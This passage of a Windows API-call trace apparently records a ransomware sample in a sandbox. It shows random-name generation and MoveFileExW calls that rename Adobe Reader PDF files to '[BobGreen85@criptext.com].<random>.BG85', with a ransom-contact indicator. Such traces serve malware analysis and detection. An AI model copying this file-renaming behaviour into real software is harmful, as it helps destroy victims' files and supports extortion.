lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0078.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0078.192] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0078.192] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0078.192] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0078.192] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\pointers.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\[BobGreen85@criptext.com].p4TXTGaX-l6hBQdly.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\[bobgreen85@criptext.com].p4txtgax-l6hbqdly.bg85"), dwFlags=0x1) returned 1 [0078.193] GetTickCount () returned 0x114bb25 [0078.193] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19853152767) returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0078.193] GetTickCount () returned 0x114bb25 [0078.193] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19853203353) returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0078.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0078.193] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\adobeid.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\[BobGreen85@criptext.com].LFczXlSH-58ZwQIvo.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\[bobgreen85@criptext.com].lfczxlsh-58zwqivo.bg85"), dwFlags=0x1) returned 1 [0078.670] GetTickCount () returned 0x114bbf0 [0078.670] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19900908452) returned 1 [0078.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0078.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0078.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0078.671] GetTickCount () returned 0x114bbf0 [0078.671] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19900996856) returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0078.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0078.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0078.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0078.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0078.672] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\adobeid.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\[BobGreen85@criptext.com].4SGarTlK-94MzJXZt.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\[bobgreen85@criptext.com].4sgartlk-94mzjxzt.bg85"), dwFlags=0x1) returned 1 [0078.860] GetTickCount () returned 0x114bcab [0078.860] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19919895972) returned 1 [0078.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0078.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0078.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0078.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0078.860] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0078.861] GetTickCount () returned 0x114bcab [0078.861] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19919985683) returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0078.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0078.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0078.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0078.862] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\[BobGreen85@criptext.com].kXydHeIE-KUfADL8F.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\[bobgreen85@criptext.com].kxydheie-kufadl8f.bg85"), dwFlags=0x1) returned 1 [0078.864] GetTickCount () returned 0x114bcab [0078.864] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19920279015) returned 1 [0078.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0078.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0078.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0078.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0078.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0078.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0078.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0078.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0078.865] GetTickCount () returned 0x114bcab [0078.865] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19920377889) returned 1 [0078.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0078.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0078.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0078.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0078.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0078.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0078.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0078.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0078.877] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\[BobGreen85@criptext.com].MzpLExXi-xmJ7ZNBF.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\[bobgreen85@criptext.com].mzplexxi-xmj7znbf.bg85"), dwFlags=0x1) returned 1 [0078.878] GetTickCount () returned 0x114bcbb [0078.878] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19921732594) returned 1 [0078.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0078.879] GetTickCount () returned 0x114bcbb [0078.879] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19921778328) returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0078.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0078.879] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\[BobGreen85@criptext.com].mMHHulSx-Az0foP6N.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\[bobgreen85@criptext.com].mmhhulsx-az0fop6n.bg85"), dwFlags=0x1) returned 1 [0078.884] GetTickCount () returned 0x114bcbb [0078.884] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19922262109) returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0078.884] GetTickCount () returned 0x114bcbb [0078.884] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19922312815) returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0078.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0078.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0078.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0078.885] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\faces.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\[BobGreen85@criptext.com].SFVRPuHv-LKMi0XV9.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\[bobgreen85@criptext.com].sfvrpuhv-lkmi0xv9.bg85"), dwFlags=0x1) returned 1 [0078.886] GetTickCount () returned 0x114bcbb [0078.886] QueryPerformanceCounter (in: 